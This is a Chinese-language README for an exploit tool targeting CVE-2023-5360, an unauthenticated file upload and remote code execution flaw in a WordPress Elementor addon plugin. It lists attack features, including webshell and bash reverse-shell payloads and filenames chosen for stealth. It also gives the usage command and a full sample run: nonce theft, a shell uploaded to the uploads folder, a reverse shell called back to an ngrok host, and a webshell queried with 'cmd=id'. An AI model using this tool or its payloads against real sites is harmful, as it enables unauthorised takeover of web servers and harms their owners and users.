CVE-2023-5360 Elementor文件上传漏洞利用
Royal Elementor Addons and Templates WordPress插件在1.3.79版本之前未正确验证上传文件,允许未认证用户上传任意文件(如PHP文件)并实现远程代码执行(RCE)。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
by X3RX3S
|
描述
这是针对CVE-2023-5360的概念验证利用程序,该漏洞存在于WordPress的Elementor Pro插件中。
它允许未认证攻击者上传任意PHP文件并获得远程代码执行权限。
功能特点
- 自动获取Elementor nonce值
- 上传简单Webshell或反向Shell
- 使用唯一文件名增强隐蔽性
- 可选的Netcat监听器辅助功能
- 设计酷炫
使用方法
1
|
python3 CVE-2023-5360.py <https://victim.site/>
|
示例:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
python3 CVE-2023-5360.py https://victim.site/
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
github.com/X3RX3SSec
by X3RX3S aka @mindfuckerrrr
[+] 目标: https://victim.site
[+] Elementor页面: https://victim.site)
[*] 步骤1: 获取Elementor nonce值...
[+] 从目标收到HTTP 200响应
[+] 提取的nonce值: fdcb5015cd
[*] 步骤2: 配置payload
[1] 简单命令Webshell
[2] 反向Shell (bash)
[?] 选择payload [1/2]: 2
[?] LHOST (你的IP): 7.tcp.eu.ngrok.io
[?] LPORT (你的端口): 31337
[+] 为7.tcp.eu.ngrok.io:31337生成的反向Shell payload
[?] 启动内置监听器? [Y/n]: Y
[+] 在7.tcp.eu.ngrok.io:31337启动本地监听器...
[*] 尝试1/3: 通过AJAX漏洞上传payload...
[>] POST https://victim.site/wp-admin/admin-ajax.php
在[any] 31337监听...
[+] 上传处理器返回HTTP 200
[+] Shell已上传: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] 触发反向Shell。请准备好监听器!
[+] 触发信号已发送(反向Shell的超时是正常的)。
[+] 攻击成功!检查你的监听器!🏴☠️💣
|
Payload选项:
- 简单命令Webshell(如:https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
- 反向Shell (Bash)
依赖项
安装依赖:
监听器示例
免责声明
此漏洞利用程序仅用于教育目的和授权的安全测试。
使用者需对自己的行为负责。
仅在拥有所有权或获得测试许可的系统上进行测试。
致谢
作者: X3RX3S
CVE-2023-5360